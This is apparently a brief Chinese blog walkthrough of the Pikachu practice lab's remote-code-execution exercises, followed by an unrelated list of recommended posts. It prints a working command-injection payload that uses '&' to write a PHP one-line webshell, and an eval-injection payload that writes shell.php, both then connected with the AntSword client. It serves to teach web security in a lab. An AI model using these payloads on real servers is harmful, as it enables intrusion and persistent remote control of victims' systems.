Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
热爱编程的小白白5 小时前
【Playwright自动化】录制生成脚本
运维·自动化
ROCKY_8175 小时前
计算机网络考试考点——应用层
服务器·网络·计算机网络
e***74955 小时前
Modbus报文详解
服务器·开发语言·php
java_logo5 小时前
MySQL Server Docker 容器化部署指南
linux·运维·数据库·docker·容器
运维管理5 小时前
anolis openeuler 文件复制上用命令-学习篇
服务器
I***t7165 小时前
自己编译RustDesk,并将自建ID服务器和key信息写入客户端
运维·服务器
誰能久伴不乏5 小时前
Linux文件套接字AF_UNIX
linux·服务器·c语言·c++·unix
BJ_Bonree5 小时前
数智先锋 | 核心应用响应时常<1s、多终端崩溃率低至 0.1%!Bonree ONE 赋能蓝月亮应用性能与终端体验双重升级!
运维
张鱼小丸子5 小时前
电脑刷机教程:轻松重装系统指南
运维
k***1955 小时前
Nginx反向代理出现502 Bad Gateway问题的解决方案
运维·nginx·gateway